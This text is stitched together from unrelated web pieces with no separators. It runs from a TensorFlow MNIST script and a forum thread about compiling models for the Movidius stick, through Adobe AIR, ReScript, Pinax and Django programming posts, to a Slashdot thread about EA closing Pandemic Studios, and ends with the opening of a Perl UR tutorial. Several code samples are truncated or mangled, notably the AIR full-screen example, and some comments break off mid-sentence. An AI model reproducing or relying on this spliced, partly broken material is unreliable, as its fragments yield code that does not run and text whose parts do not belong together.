  initial = tf.constant(0.1, shape=shape)
  return tf.Variable(initial)


def main(_):
  # Import data
  mnist = input_data.read_data_sets(FLAGS.data_dir, one_hot=True)

  # Create the model
  x = tf.placeholder(tf.float32, [None, 784], name="input")

  # Define loss and optimizer
  y_ = tf.placeholder(tf.float32, [None, 10], name="output")

  # Build the graph for the deep net
  y_conv, keep_prob = deepnn(x)

  # (The loss/accuracy graph and training loop were garbled in the
  # original post; restored from the standard TensorFlow MNIST tutorial.)
  cross_entropy = tf.reduce_mean(
      tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))
  train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)
  correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))
  accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))

  with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    for i in range(1000):
      batch = mnist.train.next_batch(50)
      train_step.run(feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})
    saver = tf.train.Saver(tf.global_variables())
    saver.save(sess, "mnist_output/" + 'mnist_default')
    print('test accuracy %g' % accuracy.eval(feed_dict={
        x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0}))
Please don't start the tutorial/explanation from tensorflow slim module. Start from reading/loading the check point file.
@aboggaram we are writing an article about this, and I expect to publish it sometime next week, will let you know as soon as it goes LIVE.
@AshwinVijayakumar : Where exactly is the example for custom tensor flow network in the blog? I am having a custom object detection tensor flow .meta file. I want to run that on Movidius neural stick.
I am using following command:
mvNCCompile -s 12 models/model.meta -in=input_1 -on=conv2_1/bias
and I am getting the following error:
[Error 34] Setup Error: Values for input contain placeholder. Pass an absolute value.
I also look forward to the blog post. Any update on how to compile a tf network using mvNCCompile is highly appreciated as well.
@ramana.rachakonda I have gone through that tutorial and followed the exact same steps, but still end up with the error shown in the mnist example above. The documentation given here is not sufficient. @AshwinVijayakumar and Intel team, can you please provide a solid example of compiling a custom network rather than those from the tf.contrib.slim module? Thanks a lot,
Achyut
+1
AshwinVijayakumar ,
any news regarding this question? I would also very much like an answer.
Also waiting for this workflow for converting a custom-trained tensorflow model into Movidius graph. My understanding is that the example script that is provided in works for the case of creating a model, with an image tensor placeholder input and final output layer that are compatible with movidius. The model is then initialized with variables from a checkpoint and re-saved, so it can be recompiled with mvNCCompile. But when using a model that was already custom-trained from a checkpoint e.g. the model zoo downloads, there does not seem to be a one-to-one mapping of the original model variables, and variable scoping has some extra prefixes that are not correctly mapped if using init_from_checkpoint(). So it would be nice to see a clear example of how to go from a tensorflow frozen graph to a movidius graph. Thanks.
The only reason I check into the forum now is to see if there has been an update on this topic.
I have been trying to get a Tensorflow ENet segmentation model to work on the NCS, but I keep running into issues such as '[Error 5] Toolkit Error: Stage Details Not Supported: RealDiv'. Is there any comprehensive list of supported tensorflow operations somewhere?
So far, I have had similar errors with the following operations (tf.*):
* div (elemwise division => RealDiv)
* abs
* log
* pow
* greater
* reciprocal
* gather_nd
Also a weird error where broadcasting did not work and I had to use tf.expand_dims() before multiplying alpha for PReLU layer.
The [Error 5] is preventing me from doing division (tf.div() becomes RealDiv), which breaks Spatial Dropout. Adding support for some of the basic math operations listed would be really nice.
I might start a new thread after looking around some more if nobody here has a list which ops are supported. Also, how do we make feature requests?
Edit: I updated to version 11, and the div/RealDiv issue seems to have been addressed. I still have not tested other operations, so my question of a list still stands.
@sjbozzo, if you are trying to get MNIST running on NCS, check out this example:
MNIST example:
Please look at this page, especially the section "Save Session with graph and checkpoint information".
Looks like you need to do something like this to save the session with specific values for input placeholders such as image size etc.
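For what it's worth, here is the kind of re-save step that approach implies -- a rough sketch only, with illustrative assumptions: the fixed [1, 784] input shape, the checkpoint paths, and the reuse of deepnn from the code above are all mine, not from the docs.

import tensorflow as tf

with tf.Graph().as_default():
    # A concrete shape instead of [None, 784]: mvNCCompile chokes on
    # placeholders whose values it cannot resolve.
    x = tf.placeholder(tf.float32, [1, 784], name='input')
    y_conv, keep_prob = deepnn(x)  # deepnn as defined in the post above
    output = tf.identity(y_conv, name='output')

    saver = tf.train.Saver()
    with tf.Session() as sess:
        # Restore the trained weights, then save an inference-only
        # checkpoint/metagraph for the compiler. For a truly clean inference
        # graph you'd also replace the keep_prob placeholder with a constant.
        saver.restore(sess, 'mnist_output/mnist_default')
        saver.save(sess, 'mnist_output/mnist_inference')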
@aboggaram ,
i am also getting same error, please let me know if you find the solution.
my detail question is here
@Tome_at_Intel Please help me here. Thanks
Awesome, thanks so much!
@AshwinVijayakumar When can we expect the article?
Waiting for it too!
Similarly interested in this article.
Also waiting for this..
I'm very interested in this topic,too.
Hi everyone, I am running a little behind on putting this article together. I was tied up putting the first 2 articles up; please watch out for the tensorflow article on this blog site.
Will you be at CES? If so, what's the booth number?
@AshwinVijayakumar I am wondering about multiple feature support -- can it be built by us somehow, or is there another way to overcome this?
@chicagobob123 , We will be at the Intel NTG, Movidius Group booth -
@GoldenWings, not sure I understand. Can you please clarify what you mean by 'multiple feature support'?
@AshwinVijayakumar I mean multiple inputs; currently the SDK supports a single input and I was wondering if there is a way to overcome this.
Also waiting for this.
So, what I have to do is train the network and save the graph, then run the Movidius compiler, which generates a new graph in the NCS format, and finally use the API to evaluate input data?
The last post was on November 21; has a new tutorial or documentation on how to train your own network been published? For example MNIST?
waiting for this.
Waiting for it too!
Despite the Mac works beautifully. You also need to make sure to change the namespace in your
appname-app.xml file:
<?xml version="1.0" encoding="UTF-8"?>
<application xmlns="">
Catching the “ESC” Key in Full Screen Mode
Now you’re ready to go. One oft-requested feature for AIR (and Flash Player) is the ability to capture the “escape” key and not have it exit full screen mode. With AIR 1.5.2 this is easy. You set an event handler for the
keyDown event and then inside of the event handler you call
event.preventDefault(). Here’s a quick example:
<?xml version="1.0" encoding="utf-8"?>
<s:WindowedApplication xmlns:
    <fx:Script>
        <![CDATA[
            protected function btn_fullScreen_clickHandler(event:MouseEvent):void {
                stage.displayState = StageDisplayState.FULL_SCREEN_INTERACTIVE;
                btn_fullScreen.
</s:WindowedApplication>
Once you call the event.preventDefault() method you can use the Escape keyCode like any other key.
Garbage Collection of XML Data
Another one that will be huge for performance optimization is the ability to mark an XML object for immediate garbage collection. To do this you can use the new System.disposeXML(xml:XML) method. Oliver Goldman gave me a great explanation of what's happening.
Even then, the disposeXML() call doesn’t immediately dispose of the XML. The XML object is backed by a graph of objects with parent/child pointers between them. Those pointers make it difficult for the GC to collect all of those objects. The disposeXML() call traverses the graph, setting all of those pointers to null, and making it much easier for collection to occur. The objects still aren’t collected right away, however—that’s still pending on the GC activity.
To use the new API you just have to call the method and then null out your XML variable. That will make it easier for the garbage collector to clean up. In the example below I load in a big XML file, do some parsing to it so that it loads into memory, then call the System.disposeXML() method.
public var xml:XML;

protected function windowedapplication1_creationCompleteHandler(event:FlexEvent):void {
    var file:File = File.applicationDirectory.resolvePath("assets/Untitled.gpx");
    var stream:FileStream = new FileStream();
    stream.open(file, FileMode.READ);
    var str:String = stream.readUTFBytes(file.size);
    stream.close();
    xml = new XML(str);
}

protected function btn_loadXML_clickHandler(event:MouseEvent):void {
    xml.normalize();
    var xmlList:XMLList = xml.children();
    var text:XMLList = xml.text();
    var xmlStr:String = xml.toString();
}

protected function btn_disposeXML_clickHandler(event:MouseEvent):void {
    System.disposeXML(xml);
    xml = null;
}
Memory Profiler using the disposeXML() method
You can see how this behaves in the profiler screenshot above. If you want to immediately garbage collect you can call System.gc(), but if you use this often it can have negative performance implications (thanks to Ethan for the tip).
The last one I wanted to touch on was a new, friendlier install screen as blogged about by Joseph Labrecque and Oliver Goldman. We got rid of the “System Access: Unrestricted” for signed applications so that if you sign your app your end users will have a nicer install experience.
Adobe AIR 1.5.2 Signed App Install Screen
Those are three of the biggies. You can download the sample project here if you want to run the full screen example and the System.disposeXML() example.
Recently, I’ve been investing quite a lot in learning ReScript and TBH I’m pretty much dead as JS developer right now because I’ve seen the better world. Much better one.
As a part of “Selling ReScript to my colleagues” campaign (and to anyone, really), I’m going to spam your feeds from time to time with ReScript.
Let’s say you created new file
Math.res. Boom, you have a new module in your app called
Math.
math.resbut module name is still capitalized:
Math.
If you create a type or a function or whatever inside your module, it's automatically available to the module's consumers using dot notation.
```rescript
let sum = (a, b) => a + b

// Now you can use `Math.sum` in another module
```
Let’s say you created file
App.res and want to use
sum function from
Math. How can you import it? The answer is “You don’t need to!”. All your root modules are available everywhere in your app. You can use any of them once you need it without messing with imports.
```rescript
let onePlusTwo = Math.sum(1, 2)
```
Imagine when you implement some UI where you need Button, Input, Link etc. etc.: every time you need a new component in JS you have to go up, import it, and go back to where you were. With ReScript, you can just use whatever you want right here, right now, without interrupting your flow. So good! Once you start using it, you'll get how brilliant this is.
Of course, you can use folders to group your files as you usually do.

Compare this to JS, where the file name, the exported name, and the imported name can all drift apart:

```js
// LoginButton.js
export default class AuthButton extends React.Component {}
```

```js
// LoginForm.js
import Button from "./LoginButton";
```
What a mess! If you ever decide to rename your component you have to change all these places to keep your naming accurate. Meh. In the ReScript world, you have only one source of truth: the file name. So it's always guaranteed accurate across the entire app.
More about the ReScript modules in the official documentation.
pinax-theme-foundation 0.2a1
Pinax theme based on Zurb's Foundation
A Foundation 3 Theme for Pinax
==============================
Contributors
-------------
* Christopher Clarke
* Kewsi Aguillera
* Lendl R Smith
What's New
------------
- This release supports Foundation 3.1 which includes features such as
  right-to-left language support, new UI styles for Progress Bars
  and Image Thumbs, updated jQuery and so on; read more about 3.1
  on the Zurb Foundation site
- Fully utilize the Foundation 3.1 responsive Top
Navigation bar rather than our home grown solution
- Included Icon Fonts, Responsive Tables and SVG Social Icons,
  Zurb add-ons which are not part of the core release
- Lay the groundwork for supporting the `--template`
  flag of `django-admin.py startproject` in the next release
Quickstart
-----------
Create a virtual environment for your project and activate it::
$ virtualenv mysite-env
$ source mysite-env/bin/activate
(mysite-env)$
Next install Pinax::
(mysite-env)$ pip install Pinax
Once Pinax is installed use **pinax-admin** to create a project for your site
::
(mysite-env)$ pinax-admin setup_project -b basic mysite
The example above will create a starter Django project in the mysite folder based on the Pinax **basic** project.
Of course you can use any of the Pinax starter Projects.
The **basic** project provides features such as account management, user profiles and notifications.
The starter project also comes with a **theme** or a collection css, javascript files.
The default theme is based on Twitter Bootstrap.
To use the **Foundation** theme in the project, include "pinax-theme-foundation" in requirements/project.txt.
Either install the package individually::
pip install pinax-theme-foundation
Or use the requirements file::
pip install -r requirements/project.txt
Next edit the **settings.py** file and
comment out the entry for "pinax_theme_bootstrap" and add "pinax_theme_foundation" in your INSTALLED APPS::
# theme
#"pinax_theme_bootstrap",
"pinax_theme_foundation",
Inside your project run::
(mysite-env)$ python manage.py syncdb
(mysite-env)$ python manage.py runserver
Templates
^^^^^^^^^^
The Pinax *setup_project* creates a *site_base.html* template which extends *theme_base.html*.
Your own templates should normally inherit from *site_base.html*. However, due to
inconsistencies between Bootstrap and Foundation you may need to perform an additional step
to ensure that the top nav bar is styled properly.
If you have created a **basic** starter project,
edit the generated *site_base.html* to remove the extra
*ul* tags found in the *{% block nav %}*. In the *basic* project the *{% block nav %}* contains profile and notices dropdown menu items.
The project *site_base.html* will contain ::
{% block nav %}
{% if user.is_authenticated %}
<ul>{% spaceless %}
<li id="tab_profile"><a href="{% url profile_detail user.username %}">{% trans "Profile" %}</a></li>
<li id="tab_notices"><a href="{% url notification_notices %}">{% trans "Notices" %}{% if notice_unseen_count %} ({{ notice_unseen_count }}){% endif %}</a></li>
{% endspaceless %}
</ul>
{% endif %}
{% endblock %}
Remove the *ul* tags so the block looks like ::
{% block nav %}
{% if user.is_authenticated %}
<li id="tab_profile"><a href="{% url profile_detail user.username %}">{% trans "Profile" %}</a></li>
<li id="tab_notices"><a href="{% url notification_notices %}">{% trans "Notices" %}{% if notice_unseen_count %} ({{ notice_unseen_count }}){% endif %}</a></li>
{% endif %}
{% endblock %}
You should provide your own "footer" template _footer.html
Also change the Site name by editing *fixture/initial_data.json*; you can also use the Admin app for this purpose.
The **url** name "home" should be defined as the homepage.
Upgrading Previous Version
---------------------------------------------
To upgrade, follow Zurb's Foundation 3.1 upgrade notes and
remove all **max-width** from CSS styling.
.. end-here
Documentation
--------------
See the `full documentation`_ for more details.
.. _full documentation:
.. _Pinax:
- Author: Chris Clarke
- License: MIT
I am currently working on a project where I need my model to have an avatar. I am using Python 3 and Django for this project. The thing is, I needed some data for this project. So I decided to create a script that will read the data from Wikipedia’s API and save it in my database.
I am currently using django-imagekit to handle the image processing for my model’s avatar. My model looks something like this:
from django.db import models
from imagekit.models import ImageSpecField
from imagekit.processors import ResizeToFill


class Person(models.Model):
    avatar = models.ImageField(upload_to='avatars', default='')
    avatar_thumbnail = ImageSpecField(source='avatar',
                                      processors=[ResizeToFill(300, 200)],
                                      format='JPEG',
                                      options={'quality': 80})
With Wikipedia’s API, I can somehow get the image URL for the article I’m looking for. My problem was how would I be able to save the image from the image URL. It took me a while to do this. The closest I found was this answer from Stackoverflow. I had to modify it because I am using Python 3 in my project.
from django.core.files.base import ContentFile
from io import BytesIO
from urllib.request import urlopen

input_file = BytesIO(urlopen(img_url).read())  # img_url is simply the image URL

person = Person.objects.create()
person.avatar.save("image.jpg", ContentFile(input_file.getvalue()), save=False)
person.save()
I streamed the image using the builtin BytesIO object in Python 3 and put it onto Django's ContentFile before finally saving it in the Person object.
This worked well for me. I am not sure whether there’s a better way of doing this but if there is, I would love to know!
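Incidentally, one small simplification (an untested sketch, same assumptions as above) is to skip the BytesIO buffer entirely, since ContentFile accepts raw bytes directly:

from urllib.request import urlopen

from django.core.files.base import ContentFile

person = Person.objects.create()
person.avatar.save("image.jpg", ContentFile(urlopen(img_url).read()), save=True)

Passing save=True persists the model in the same call, so the separate person.save() isn't needed.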
Hmmmm. (Score:2)
Re: (Score:2)
I can't imagine there's a ton of VC floating around right now, and even less so for folks coming out of an unsuccessful (as of late) studio.
Not to say that has anything to do with the developers, mind you.
Re: (Score:2)
Re: (Score:2)
There is VC to be had, but not for video game developers. Most of it is going to web startups, places with lower cost to fund (2-5 guys salary, rather than 25+) and the potential to make a massive return (valuations in the 10s or 100s or millions of dollars). Indie gaming just isn't as safe of an investment or have the potential of such high returns.
EA (Score:2)
EA destroys and corrupts whatever it touches. A developer being bought by EA is the kiss of death
But I thought that they bring out the whips and chains first??
Re: (Score:2)
I agree. The C&C series is what made me love RTS-type games. C&C, Red Alert etc. are the classics of a game studio that just did it right. Sadly, that was killed by EA and nobody has really stepped up to fill the gap
:(
Re:EA (Score:5, Interesting)
In particular co-op RTSs seem to be non-existent, and most that do support it seem like it was added at the last moment on a whim. If you're interested in a game that has more focus on the S part of RTS, and excellent co-op opportunities, I recommend AI War: Fleet Command [arcengames.com]. It's an indie game written by a developer who actually cares about its playerbase (no, I'm not that developer, but I do play the game), and makes free DLC available almost every week with bug fixes, gameplay improvements, new units, etc. The gameplay is very asymmetrical. The enemy has already taken over the galaxy and is now distracted with other pursuits. The more planets you capture and the more structures you destroy the more annoyed the enemy becomes, sending larger and more powerful fleets against you. You can't go recklessly taking over every planet you encounter because the enemy would soon be mighty pissed and send everything it has against you.
It's not for everyone, however you should at least check it out if you're finding the RTS platform has been lacking as of late.
Re: (Score:2)
The dev of that game lurks around /. too.
Re: (Score:2)
Re:EA (Score:4, Insightful)
One word:
BULLFROG.
Re:EA (Score:5, Insightful)
I wonder what will happen to their next game, The Saboteur, which is due out in 3 weeks. It is worth noting that they have no other projects announced recently, perhaps this was long on the horizon.
Re: (Score:2)
For the most part the game is done. Any necessary patches, etc. are being handled by the 25.
Re: (Score:1)
Besides, the TFA (second link) clearly points the finger at Pandemic's internal management, rather than EA.
Re: (Score:2)
I do. I'm hoping they could "reform" and be out from EA's thumb. Great company, and being bought up by EA was the worst thing that could happen.
Unfortunately if this happens, they lose much of the IP I would really consider to be theirs in the first place.
Re: (Score:4, Interesting)
What's interesting is that Bioware merged with Pandemic before being bought by EA. Seemed odd that an RPG developer would get together with an FPS developer like that. Also seems strange that, if Pandemic was so poorly managed as indicated in other comments, an amazingly well-run company like Bioware would merge with it. Another oddity here is that Riccitiello, the current CEO of EA, was one of the people who orchestrated the Bioware/Pandemic merger before EA acquired them and he became CEO.
Given all these facts the closure of Pandemic could be a deep betrayal or someone getting their freedom after a big payout. Ah, the world of game business.
At any rate, I keep reminding people that Bioware is now owned by EA. Other studios manage to put out a few good games before they're killed off by EA, too. So, keep hoping the streak lasts.
Re: (Score:3)
Yup...I miss the old Westwood so much. Command & Conquer was such a great series before EA got their hands on it. I was actually recently playing over the original again after downloading it from an abandonware site*, and it's still far better than most of the recent ones. Generals isn't bad, though the whole 'generals abilities' thing and unlimited cashflow buildings take a lot out of the game. But C&C3 and RA3 are both complete garbage. Such a huge loss...
I still remember playing on...what the hel
Re: (Score:2)
I keep hearing "RA3 and TW are so horrible!" but nobody ever states a good reason. Is it because they're so polished? Having "big name" actors in the cutscenes? What is it?
I've been playing C&C games since Tiberian Sun, and I like Tiberium Wars and Red Alert 3 better than the previous games. Plus, come on, Tim Curry! TIM CURRY!
Re: (Score:2)
The balance for one. They're too easy. I beat TW in under a week. Yet I've played the original countless times and I still don't think I've ever actually beaten it without taking advantage of game bugs ('sandbag trick' anyone?). It's actually a _challenge_. TW and RA3 are just a grind. Sure, the missions had a bit more depth to them - a few more objectives and larger enemy bases, but in the end it all boiled down to building a shitload of one unit and storming the enemy with it. What fun is that? That shit
Re: (Score:2)
Interestingly one of my pet peeves with the original C&C as well as most RTS games is that they are way too easy for about 80% of the game and painfully hard for the remaining 20%, nothing like getting stuck halfway through a game because you just can't get past some ridiculously hard level (bonus points if it's one of those C&C trademark "fuck this strategy shit, let's just give the player two engineers and a commando" levels that are basically squad tactics and involve no large-scale strategy what
Re: (Score:2)
Joke aside, I've yet to find strategy games that are actually balanced and fun. Total Annihilation came close, and is one of my all-time favorites. Still I'd like some strategy game which is based on what a war could actually be.
Most of the missions on every RTS out there could be lost by the player in the first two seconds if the AI was truly playing a competitive game. I mean, i
Re: (Score:3, Interesting)
Re: (Score:2)
I think that the problem may be that most RTSes focus on the battle phase of war, which coincidentally is also the least meaningful. As they say, it's the planning that wins the war, not the actual skirmishes, while Europa Universalis ditch i
Re: (Score:3, Interesting)
That's a bit trite. Given the vast tech tree and weapon-vs-target modifiers in Warzone 2100, "most powerful" is largely subjective. What's more "powerful", super-heavy tracked bodies with heavy cannons, packs of light-bodied VTOLS with tank-killer missiles, or swarms of cyborgs with lasers? And how about the decision whether to build mobile units, or to go hog wild on building long ranged fixed artillery and the
Re: (Score:2)
Re: (Score:2)
and even better, even the players of the PC version freely admit that the PSone port (simultaneous release on both platforms, believe it or not) is the exact same game, running at lower resolution. It's 3D so it runs better on the PSone than the C&C ports do and you can have your units behave intelligently, like returning for repair when they get heavily damaged. It also supports the PSone mouse with UI changes if you plug it in. The briefing lady's voice is VERY familiar to SOCOM players.
Re: (Score:1)
If you liked TA, give Supreme Commander a try... some really innovative game play mechanics were introduced.
(SupCom was created by the same guy(s) that created TA)
SupCom 2 is supposedly coming out soon, and as a bonus will be able to run on a 360. (meaning that a dual core should easily be able to churn out a good 2000+ unit battle)
Re: (Score:2)
What I meant was that most games that are called Realtime Strategy are actually Realtime Tactics.
/Mikae
Re: (Score:2)
I've been playing C&C games since Tiberian Sun, and I like Tiberium Wars and Red Alert 3 better than the previous games.
You're not going back far enough.
As someone who has played C&C since the original, Tiberian Sun was the worst of the first four games (C&C 1 and 2, RA 1 and 2), so it's not surprising that you might think the new games are better. But you'd be wrong... the other three games are terrific. The feel of C&C1 and RA1 have never been surpassed. I still play RA2, which is also great fun.
Re: (Score:2)
Okay, I confess I <3 all three of the Red Alert series.
Re: (Score:2)
Less than three, that is.
Re: (Score:2)
Yep. In recent times also Mercenairies 2 was one of the best coop games I've ever played, if not the best, the free world with so many vehicles and toys to play with just opened so many doors to play around- just doing fun stuff like sticking the cruise missile target beacon onto the side of your friends helicopter and watch him fly around with a cruise missile chasing him was pretty funny. Attacking the enemy base by stealing a large enemy helicopter then slowly dismantling their base by airlifting all the
Re: (Score:2)
Westwood
...
Mythic
Bullfrog
Origin
anymore?
Re: (Score:2)
Maxis to some degree...
Re: (Score:2)
Problem is, as long as millions buy the same sports game year after year, EA won't be gone for good...
People have voted with their wallet, and that vote is to shovel millions at EA for the same game, over and over, every year.
Re: (Score:2)
Another good example is Bullfrog. After being "acquired", every single employee quit, and they founded a new company. Then when that company got bought by EA too, again 60% quit on the spot.
That says something about how much EA is 'loved'.
I know two ex-EA developers. They both are basically alcoholics now, because of it.
If you are there, you are basically a slave code monkey. Their whole process of game development is from its innermost core designed to kill off all creative life.
Re: (Score:2)
If the people selling it had given a damn they'd have had a poison pill provision to protect their people. Since EA is a known evil the sellouts are wholly to blame.
The 25 employees who remain ... (Score:3, Informative)
Obligitory (Score:2)
So EA wanted to drop the hammer on a pandemic (Score:1)
Re: (Score:2)
Unfortunately, it seemed like they may have actually been getting better as they made more games...
Re:They are NOT hurting for funding (Score:4, Insightful)
Re: (Score:2)
To be fair, there is very little evidence that EA could, in fact, improve their bottom line by steadily generating quality product. Since they've never managed to steadily generate quality product, we'll never know.
actually EA changed quite a lot in the past few years, take a look at need for speed for example, they were making the same shit every year, this year they changed the developer team and they probably made the best racing game ever, second only to gran turismo. They also produced other great games made by DICE(mirror's edge, battlefield) or BioWare(mass effect, dragon age)
now take a look at activision, they fucked up pc players with no dedicated servers, if that wasn't enough they asked steam to ban/rev
Re: (Score:2, Interesting)
Shift was a crap game. They released it half-finished, car selection sucks, engine and car tuning is SOOOOO generic, suspension tuning is all bugged out, opposite-lock not required (all cars seem to magically neutral-drift through all corners). I could go on and on. To even suggest that Shift be put anywhere near Gran Turismo or Forza is laughable.
I will admit I really like the direction they took the series and the game sounded GREAT but I think we'll have to wait for Shift 2 or 3 before they've found t
Re: (Score:2)
Blizzard... but they are the major exception to the rule (the Pixar of games?)
Other than that I agree completely about the 'global economy' bs. Not every job is 'cog' job despite management's wet dream fantasies to make it so....
Re: (Score:1, Troll)
Re: (Score:2)
Blizzard is more than the WoW MMOG crack market that is their most recent creation... Starcraft, Diablo, Warcraft etc...
Re: (Score:2)
Blizzard is more than the WoW MMOG crack market that is their most recent creation... Starcraft, Diablo, Warcraft etc...
True enough, but those other franchises haven't had games released in years. I'm looking forward to that changing. Oh Diablo III, you can't get released soon enough.
Re: (Score:1, Funny)
Re: (Score:2)
If only someone knew what that "NASCAR" acronym meant!
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
They and Bioware only have their freedom as long as every game sells well; as soon as they produce even one stinker, they are screwed.
Happened in the past as well, in case of Origin it was even worse, EA started to talk itself into the decisions even before the first game under their umbrella was released, they did not stand a chance in the first place.
Blizzard is in the same position at Activision as Bioware is in EA, as long as they meet the expectations they have a more or less free reign (although I sti.
Sustainability? (Score:2)
Is this model sustainable? With the number of expansions, absorbed companies and conquests, it looks like EA is turning into the GM of gaming. They may be healthy now, but what about in a year? 5 years? 10 years? It's like cutting off your pinky to lose weight. It's gone, and never coming back.
Re: (Score:1)
Also, a Spore movie [kotaku.com]. And I think they're making one for Dead Space and maybe The Sims.
Re: (Score:2)
Don't forget they are also firing the ENTIRE current C&C team [kotaku.com] so they can bring in some guy who is gonna "transform Command and Conquer with a new digital model that is going to re-ignite the fan base for this franchise."
Damn, does this company LOVE the buzzword bingo or what? WTF is a "new digital model"? I'm shocked someone didn't throw synergy in there while they were at it. They are also bringing in somebody to "reinvent" the MOH series, so expect that to suck some major balls as well. It's sad that
Re: (Score:2)
Game publishers spend huge amounts on marketing. Opening a couple of storefronts for a couple of months doesn't even make a dent in their budget. The total cost of this stunt would have covered the salary of one or two programmers for a year, tops.
Which is not to say that this was a good marketing ploy. Indeed, it strikes me as pretty dumb. But it's hardly proof that EA is rolling in cash.
Damn it, EA... (Score:1)
I'll then bankroll a proper Wing Commander game since you people don't seem interested in doing it.
Re: (Score:2)
The galling part is that EA will rush to a fire sale and gobble up any IP they can get their hands on and then go out and produce 5 or 6 new series that are similar to the IPs that they just threw hundreds of thousands at. Its like someone there confused patent with trademark.
Re: (Score:2)
The bad thing is, all the yearly sports titles keep EA afloat without them they would have folded a long time ago, but there are literally millions out there in the world who will buy the same game every year on and on just for the updated statistics.
Thanks to those idiots we have to live with EA, and thanks to the idiots buying the next incarnation of Guitar Hero every year, Activision, once a very good publisher, pulls the same stunt as EA.
EA tried to break out of that cycle recently, because they know, the
Re: (Score:2)
Wing Commander 4 and Ultima 8 already were developed fully under EA influence, so go figure...
Wing Commander 4 sucked, Ultima 8 while not bad per se was branded as Super Mario Avatar!
Re: (Score:3, Interesting)
Tried to play the SNES version one day; it was not that bad, it mostly was a 1:1 port of the PC version. Wing Commander 1 was a very basic game to begin with, limited by the machines of that time. Wing Commander 2 was the one which gave the series its good name and Wing Commander 3 was the one which made it famous. (And Wing 4 killed it thanks to EA's heavy influence, to which you can attribute everything which sucked about part 4.)
Re: (Score:2)
Long time, but I do not remember it that way. WC4 was my favourite since it had a solid plot with a few twists, compared to WC3 where Chris Roberts was still experimenting and used the classic evil-aliens-we-must-exterminate plot. For some part of WC4 you could actually choose sides (though the plot had to converge at some point).
What really killed the series was WC5. Bad acting, bad plot, no details ever given about the enemies, gameplay not significantly improved.
Re: (Score:2)
Urgs sorry, I mixed it up, yes Prophecy was the game which took the series down, the first WC where EA had full control because Roberts had gone and people from EA replaced him and his team.
I forgot about the real 4, Price of Freedom.
Re: (Score:2)
Huh. I was expecting an Ultima whine.
Move along nothing to see (Score:2)
I've lost count of how many studios EA has chewed up and spit out.
This isn't news, it's just more of the same.
Re: (Score:2)
Next one is Bioware... they already are bought. I am just waiting for the first game that does not meet expectations; that will be the time EA's screw-everything-up management takes over, and after that we probably will see a Baldur's Gate shooter or Dragon Age Football on a yearly basis, and after a while it will be shut down.
Re: (Score:2)
What's worse is it'll be EA's management that causes them to release something half baked and soulless.
Gamasutra job listings (Score:2)
I assume one of the bad management decisions was seemingly spending all their money on Gamasutra job postings? When I was looking around for a new job a couple of years ago it seemed like every other posting was for a position at Pandemic. co
Conflict of interest? (Score:4, Interesting)
The interesting part of this is that the CEO had EA purchase his old company for a high amount of $$$ and only two years later shut it down while he personally pocketed several million. [escapistmagazine.com]
Re: (Score:2)
Bioware also was in his assets, and he sold it off to EA while pocketing the money...
Not sure if this is not insider trading.
Re: (Score:2)
Bad management is the cause of so many corporate failures; it amazes me that those with a business degree are not flagged by GOOD company founders to be automatically denied employment. I am serious here: we saw this back in the late 1990s when you had a ton of non-technical people being placed as vice presidents of technical companies, and look at how many of them have crashed since then. Even the whole .com meltdown was caused by too many technical companies being founded by non-technical people with
Re: (Score:2)
Your story is very familiar. Almost every day, a big company buys a little company thinking that a successful small business can become a blockbuster big business with a little infusion of capital and other resources. Some companies know how to pull this off, but it usually seems to fail, both because of the scaling issues you describe and because of the clash of management cultures between the two entities.
I used to work at Sun, and that company made one disastrous acquisition after another. The last one w
Every time they do this... (Score:1)
EA reminds me of something (Score:2, Funny)
Re: (Score:2, Interesting)
The Star Wars Battlefront PC games were pretty good. The console ports were decent too.
Re: (Score:2)
Command and Conquer. Though I'd say a better comparison would be how many people are willing to buy the game today vs. how much effort the community has put into the game.
Re: (Score:2)
Re: (Score:2)
Me and a group of my buddies who were big fans of Battlezone were actually quite disappointed with Battlezone 2. The game mechanics and the general feel of the game (not to mention very awkward controls, especially on tracked vehicles) resulted in the game flopping with most of the players of Activision's original remake.
And as to the following, many games have hard-core addicts who try to keep them alive long past the "best before" date. Even the original Battlezone still has servers runnin
Re: (Score:2, Interesting)
You...are...so...wrong
Destroy All Humans 1 & 2 is a damn good game series.
Mercenaries 1 & 2 are also good games.
Re: (Score:2)
Mercenaries 2 is filed under "Shit, Complete & Total"
It was just another shitty GTA rip-off with uninspired weapons, boring vehicles, a plot that made 30 Days of Night look good, and actually forced you to be a nearly-decent human being (killing innocent civilians has repercussions beyond drawing the attention of enemy forces? lamesauce) instead of a psychotic murdering rapist.
Oh, and the hardest thing in the whole game was not losing the will to live after pressing over 9000 buttons in the same lameass
Re: (Score:2, Interesting)
Re: (Score:2)
Star Wars: Battlefront 1 & 2 says you are wrong.
Re:
Re: (Score:3, Interesting)
Yeah, that's basically my experience with them. I still install & play the first one sometimes, mostly to play single-player with bots and do Hoth over and over, or to play the galactic conquest mode or whatever it's called. It's not a great game, but come on, Hoth!
II was terrible, though. Maybe it's better multiplayer?
Re: (Score:2)
Re: (Score:1, Interesting)
UR::Manual::Tutorial - Step-by-step guide to building a set of classes for a simple database schema
We'll use the familiar "Music Database" example used in many ORM tutorials:
Our database has the following basic entities and relationships:
The tool for working with UR from the command line is 'ur'. It is installed with the UR module suite.
Just type "ur" and hit enter, to see a list of valid ur commands: > ur Sub-commands for ur: init NAMESPACE [DB] initialize a new UR app in one command define ... define namespaces, data sources and classes describe CLASSES-OR-MODULES show class properties, relationships, meta-data update ... update parts of the source tree of a UR namespace list ... list objects, classes, modules sys ... service launchers test ... tools for testing and debugging
The "ur" command works a lot like the "svn" command: it is the entry point for a list of other subordinate commands.
    > ur define
    Sub-commands for ur define:
        namespace  NSNAME               create a new namespace tree and top-level module
        db         URI NAME             add a data source to the current namespace
        class      --extends=? [NAMES]  Add one or more classes to the current namespace
At any point, you can put '--help' as a command line argument and get some (hopefully) helpful documentation.
In many cases, the output also resembles svn's output where the first column is a character like 'A' to represent something being added, 'D' for deleted, etc.
(NOTE: The "ur" command, uses the Command API, an API for objects which follow the command-pattern. See UR::Command for more details on writing tools like this.
A UR namespace is the top-level object that represents your data's class structure in the most general way. For this new project, we'll need to create a new namespace, perhaps within a testing directory.
ur define namespace Music
And you should see output like this:
    A   Music (UR::Namespace)
